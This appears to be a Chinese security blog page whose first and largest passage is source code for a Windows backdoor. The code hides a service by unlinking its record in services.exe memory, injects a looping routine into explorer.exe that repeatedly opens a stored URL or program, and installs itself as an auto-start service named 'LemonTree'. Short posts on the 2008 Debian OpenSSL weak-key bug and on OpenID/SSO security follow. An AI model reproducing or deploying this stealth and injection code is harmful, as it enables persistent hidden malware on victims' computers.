 wsprintf( tmpBuffer, L"pRet is 0x%08x\n", (DWORD *)(pSvcRd) );
 LogToFile( tmpBuffer );
 #endif

 break;
 }
 }
 }

 UnmapViewOfFile(pMap);
 CloseHandle(hFileMap);
 CloseHandle(hFile);

 //printf( "addr: 0x%08x\n", (DWORD *)pRet );
 return pRet;
}

// 隐藏服务
BOOL HideService( WCHAR *Name )
{
 DWORD Pid;
 HANDLE hProcess;
 SC_SERVICE_RECORD SvcRd, *pSvcRd;
 DWORD dwRead, dwNameSize;
 WCHAR SvcName[MAX_PATH] = { 0 };

 dwNameSize = ( wcslen(Name) + 1 ) * sizeof(WCHAR);

 if (dwNameSize > sizeof(SvcName)) return FALSE;

 Pid = GetProcessIdByName( TEXT("Services.exe") );

 #ifdef DEBUG
 WCHAR tmpBuffer1[256] = { 0 };
 wsprintf( tmpBuffer1, L"Pid is %d\n", Pid );
 LogToFile( tmpBuffer1 );
 #endif

 if (Pid == -1) return FALSE;

 if( ! SetDebugPrivilege() ) return FALSE;

 hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
 if (NULL == hProcess) return FALSE;

 pSvcRd = FindFirstServiceRecord(hProcess);
 if (NULL == pSvcRd)
 {
 #ifdef DEBUG
 LogToFile( L"Can't Find ServiceDatabase.\n" );
 #endif

 CloseHandle(hProcess);
 return FALSE;
 }

 do
 {
 if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
 ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead))
 {
 // 匹配服务名
 if ( 0 == _wcsicmp(SvcName, Name) )
 {
 // 从链表中断开（一般来说ServiceRecord是可写的，但还是先改保护属性以防万一）
 ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next);
 ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);

 #ifdef DEBUG
 WCHAR tmpBuffer2[256] = { 0 };
 wsprintf( tmpBuffer2, L"The Service \"%s\" Is Hidden Successfully.\n", Name );
 LogToFile( tmpBuffer1 );
 #endif

 CloseHandle(hProcess);
 return TRUE;
 }
 }
 else
 {
 break;
 }
 }
 while (pSvcRd = SvcRd.Next);

 if( NULL != hProcess )
 {
 CloseHandle(hProcess);
 }

 return FALSE;
}

这个是注入到explorer.exe进程中的代码，大部分参数是写内存写进去的，有少部分实在懒得搞了，用了一点汇编。

typedef struct _Arguments
{
    char    MyUrl[512];
    char    MyProgram[512];
    FARPROC    MyLoadLibrary;
    FARPROC    MyGetAddress;
    char    MyKernelDll[32];
    char    MyShellDll[32];
    char    MyZeroMemory[32];
    char    MyShellExecute[32];
    DWORD    SleepTime;
}Arguments;

/**************************************************************************************************
* WINAPI函数原形
**************************************************************************************************/
typedef HMODULE (__stdcall *LOADLIBRARYA)( IN char* lpFileName );
typedef FARPROC (__stdcall *GETPROCADDRESS)( IN HMODULE hModule, IN char* lpProcName );
typedef void (__stdcall *ZEROMEMORY)( IN PVOID Destination, IN SIZE_T Length );

void __stdcall CustomFunction( LPVOID my_arguments )
{
    Arguments    *func_args = (Arguments *)my_arguments;

    LOADLIBRARYA    LoadLibraryA = (LOADLIBRARYA)func_args->MyLoadLibrary;
    GETPROCADDRESS    GetProcAddress = (GETPROCADDRESS)func_args->MyGetAddress;

    HMODULE    h_kernel = LoadLibraryA( func_args->MyKernelDll );
    HMODULE    h_shell = LoadLibraryA( func_args->MyShellDll );

    ZEROMEMORY    ZeroMemory = (ZEROMEMORY)GetProcAddress( h_kernel, func_args->MyZeroMemory );
    DWORD    MyShellExecuteA = (DWORD)GetProcAddress( h_shell, func_args->MyShellExecute );
    DWORD    MySleep;
    DWORD    sleep_time = func_args->SleepTime;

    __asm
    {
        push eax
        push esp

        sub esp, 6

        mov    byte ptr [esp], 'S'
        mov    byte ptr [esp+1], 'l'
        mov byte ptr [esp+2], 'e'
        mov byte ptr [esp+3], 'e'
        mov byte ptr [esp+4], 'p'
        mov byte ptr [esp+5], ''
        lea eax, [esp]

        push eax
        push h_kernel
        call GetProcAddress
        mov  MySleep, eax

        add esp, 6
        pop esp
        pop eax
    }

    while( 1 )
    {
        __asm
        {
            push eax
            push esp
            push ecx
            push ebx

            sub    esp, 256

            mov    byte ptr [esp], 'o'
            mov    byte ptr [esp+1], 'p'
            mov    byte ptr [esp+2], 'e'
            mov byte ptr [esp+3], 'n'
            mov byte ptr [esp+4], ''
            lea    ebx, [esp]

            push SW_SHOWMAXIMIZED
            push 0
            push func_args

            mov    ecx, func_args
            add    ecx, 200h
            lea    eax, [ecx]
            push eax

            push ebx
            push 0

            call MyShellExecuteA

            add esp, 256

            pop ebx
            pop    ecx
            pop    esp
            pop    eax

            push sleep_time
            call MySleep
        }
    }
}

这个是控制服务的，正常的服务程序都有的代码，流氓软件应该不接受停止服务请求。

/**************************************************************************************************
* 全局变量
**************************************************************************************************/

#define SERVICE_NAME            L"LemonTree"
#define SERVICE_DESCRIPTION        L"LemonTree"
#define    SERVICE_DISPLAY_NAME    L"LemonTree"

SERVICE_STATUS            serviceStatus;
SERVICE_STATUS_HANDLE    hServiceStatus;

BOOL                ServiceInstall( WCHAR * );            //安装服务
BOOL                ServiceUnstall( WCHAR * );            //删除服务
void                ServiceControl( DWORD );            //控制服务
BOOL                ServiceExists( WCHAR * );            //判断服务是否存在

/***********************************************************************************
* 安装服务
* 参数：主程序全路径
* 返回：成功返回TRUE，否则为FALSE
***********************************************************************************/

BOOL ServiceInstall( WCHAR *exeFilePath )
{
    WCHAR    tmpPath[MAX_PATH] = { 0 };
    HKEY    key;

    SC_HANDLE serviceMangerHandle = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE );
    if ( serviceMangerHandle == 0 )
    {
        printf( "Install: Open services manager database error: %d\n", GetLastError() );
        return FALSE;
    }

    SC_HANDLE serviceHandle = CreateService
    (
        serviceMangerHandle ,
        SERVICE_NAME ,
        SERVICE_DISPLAY_NAME ,
        SERVICE_ALL_ACCESS ,
        SERVICE_WIN32_OWN_PROCESS ,
        SERVICE_AUTO_START ,
        SERVICE_ERROR_NORMAL ,
        exeFilePath ,
        NULL ,
        NULL ,
        NULL ,
        NULL ,
        NULL
    );

    if ( serviceHandle == 0 )
    {
        printf( "Create service error: %d\n", GetLastError() );

        CloseServiceHandle( serviceMangerHandle );
        return FALSE;
    }

    wcscpy( tmpPath, L"SYSTEM\CurrentControlSet\Services\" );
    wcscat( tmpPath, SERVICE_NAME );

    if( RegOpenKey( HKEY_LOCAL_MACHINE, tmpPath, &key ) != ERROR_SUCCESS )
    {
        printf( "Open key %s error: %d\n", tmpPath, GetLastError() );
        return FALSE;
    }

    RegSetValueEx( key, L"Description", 0, REG_SZ, (BYTE *)SERVICE_DESCRIPTION, wcslen(SERVICE_DESCRIPTION) );

    RegCloseKey(key);

    if( !StartService( serviceHandle, 0, 0 ) )
    {
        printf( "Install service ok, but start it error: %d\n", GetLastError() );
    }
    else
    {
        printf( "Install service ok, start it ok.\n" );
    }

    CloseServiceHandle( serviceHandle );
    CloseServiceHandle( serviceMangerHandle );

    return TRUE;
}

/**************************************************************************************************
* 删除服务
**************************************************************************************************/

BOOL ServiceUnstall( WCHAR *serviceName )
{
    SC_HANDLE scmHandle = OpenSCManager (NULL, NULL, SC_MANAGER_ALL_ACCESS);

    if ( scmHandle == NULL )
    {
        return FALSE;
    }

    SC_HANDLE    scHandle = OpenService( scmHandle, serviceName, SERVICE_ALL_ACCESS );

    if( scHandle == NULL )
    {
        CloseServiceHandle( scmHandle );

        return FALSE;
    }

    DeleteService( scHandle );

    CloseServiceHandle( scHandle );
    CloseServiceHandle( scmHandle );

    return TRUE;

}

/**************************************************************************************************
* 服务控制函数
**************************************************************************************************/

void ServiceControl( DWORD request )
{
    #ifdef DEBUG
        LogToFile( L"ServiceControl: Into ServiceControl\n" );
    #endif

    switch ( request )
    {
        case SERVICE_CONTROL_PAUSE:

            serviceStatus.dwCurrentState = SERVICE_PAUSED;

            break;

        case SERVICE_CONTROL_CONTINUE:

            serviceStatus.dwCurrentState = SERVICE_RUNNING;

            break;

        case SERVICE_CONTROL_STOP:

            #ifdef DEBUG
                LogToFile( L"ServiceControl: Try to stop service\n" );
            #endif

            serviceStatus.dwWin32ExitCode = 0;
            serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
            serviceStatus.dwCheckPoint = 0;
            serviceStatus.dwWaitHint = 0;

            break;

        case SERVICE_CONTROL_INTERROGATE:

            break;

        default:

            #ifdef DEBUG
                LogToFile( L"ServiceControl: Error arguments\n" );
            #endif

            break;
    }

    if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
    {
        #ifdef DEBUG
            WCHAR    tmp[256] = { 0 };
            wsprintf( tmp, L"ServiceMain: Control service error: %d\n", GetLastError() );
            LogToFile( tmp );
        #endif
    }

    return;
}

BOOL ServiceExists( WCHAR *path )
{
    WCHAR    tmpPath[MAX_PATH] = { 0 };
    HKEY    key;
    WCHAR    value[512] = { 0 };

    int        type = REG_EXPAND_SZ;
    int        size = sizeof(value);

    wcscpy( tmpPath, L"SYSTEM\CurrentControlSet\Services\" );
    wcscat( tmpPath, SERVICE_NAME );

    if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, tmpPath, 0, KEY_QUERY_VALUE, &key ) != ERROR_SUCCESS )
    {
        //printf( "RegOpenKeyEx Error: %d\n", GetLastError() );
        return FALSE;
    }

    if( RegQueryValueEx( key, L"ImagePath", NULL, (DWORD *)&type, (BYTE *)value, (DWORD *)&size ) != ERROR_SUCCESS )
    {
        //printf( "RegQueryValueEx Error: %d\n", GetLastError() );

        return FALSE;
    }

    if( key )    RegCloseKey( key );

    // 如果服务的程序路径等于后门本身，表示已经安装
    if( 0 == _wcsicmp( value, path ) )
    {
        return TRUE;
    }

    return FALSE;
}

[News]Debian灾难

2008-05-15T18:43:00.000-07:00

by axis
2008-05-16
http://www.ph4nt0m.org

Debian OpenSSL包里的算法有问题，random number生成居然是在process pid里选取，导致生成key可穷举

以下摘自metasploit的blog
The Bug
On May 13th, 2008 the Debian project announced that Luciano Bello found an interesting vulnerability in the OpenSSL package they were distributing. The bug in question was caused by the removal of the following line of code from md_rand.c

MD_Update(&m,buf,j);
[ .. ]
MD_Update(&m,buf,j); /* purify complains */

These lines were removed because they caused the Valgrind and Purify tools to produce warnings about the use of uninitialized data in any code that was linked to OpenSSL. You can see one such report to the OpenSSL team here. Removing this code has the side effect of crippling the seeding process for the OpenSSL PRNG. Instead of mixing in random data for the initial seed, the only "random" value that was used was the current process ID. On the Linux platform, the default maximum process ID is 32,768, resulting in a very small number of seed values being used for all PRNG operations.

所有在2006.9月到2008.5.13的debian平台上生成的key均受影响。 debian很快修复了此漏洞，并给出了blacklists和自查工具。

攻击工具应该很快会出现，metasploit已经生成了key的数据库，可以用类似rainbow的方法去查询，也可以直接暴力破解ssh key。

现在就等worm什么时候出现了。

因为这个漏洞比较严重，所以特此记录，立此存照。

相关链接：
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=363516

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=363516

http://metasploit.com/users/hdm/tools/debian-openssl/

http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/61666

http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/61606

http://www.debian.org/security/2008/dsa-1571

[Tips]OpenID and SSO

2008-05-14T01:22:00.000-07:00

by axis
2008-05-14
http://www.ph4nt0m.org

OpenID技术在国外已经很火了，在国内在刚刚起步。其实OpenID也是一个SSO(单点登录)的思想。目前随着web2.0技术的发展，网站之间交互越来越多，认证也即将迎来Identity2.0时代。OpenID就是其代表产物。

在Identity2.0的概念里，认证已经从网站通过用户名和密码来认证用户（目录查询类型的认证），转移为由第三方提供者来进行认证。也就是说，到别的第三方机构去认证该用户，网站本身不需要关心用户identity管理、用户认证。关于Identity2.0的更多资料，大家可以访问http://identity20.com这个网站，作者有一个非常精彩的演讲。

OpenID由provider生成一个link，通过这个link，网站对该用户进行认证。这个link可以是一次性的。这里需要注意的是link如果被截获到可能会发生hijacking攻击。所以通道加密往往会起到很重要的作用。还有一些csrf的问题也是在设计系统时需要关心的，对抗方法是加上anti-csrf-token。

OpenID的出现，让用户只需要记住一个用户名和密码（在provider上的），就能够登录所有支持该OpenID provider的网站，大大提高了用户体验。对于网站来说，他们不需要去管理用户的登录信息，减少认证这个环节，大大节约了成本，而且安全性还提高了。

为什么说安全性提高了呢？因为风险被集中化了。风险集中到了OpenID provider身上，如果OpenID出现安全风险导致帐户被窃取，那么所有网站都能被登录。但是这样做也是有好处的。SSO的优点在于可以集中最大精力来保护重要的登录入口。比如可以使用双因素认证（RSA令牌，USB Key、客户端证书等技术）。武侠小说里经常描述最强的一点就是最弱的一点，SSO很深刻的反应了这种情况。

其他SSO技术有的是基于cookie的，但是我认为这种放在cookie里的认证还是存在一定风险的，cookie本身就不是个什么好玩意，cookie让跨站和浏览器漏洞（比如跨域的）有了用武之地。而OpenID技术本身不依赖于cookie，只要设计的好完全能杜绝许多威胁。

目前OpenID面临的最大风险可能是钓鱼（对于面对公众的openid provider来说，内部系统无此威胁）。但是通过双因素认证，不依赖于密码验证用户身份，或者使用sign seal技术（主动识别真实网站），也能规避钓鱼的风险。

还有些SSO技术是基于安全协议的，不过没有深入研究，希望有道友能够补充。

值得一提的是，在国内有家叫onedoor.cn的网站，它不光支持openid技术，同时还支持保存密码，然后帮助用户去sso其他网站。从网站的角度来说，这样的做法是正确的。但是从安全工作者的角度来说，不建议客户这样做，将密码交给第三方网站保存不是一个明智的做法。

总的来说，Identity2.0是优于目前的登录、认证技术的，在web2.0的发展中，必然会发挥越来越大的影响。

关于openid更多的资料，可以访问 http://openid.net
对于国内用户，想体验openid技术最方便的就是通过yahoo id登录flickr! ，当然需要先在yahoo上开通openid，不过有向导引导操作，非常简单。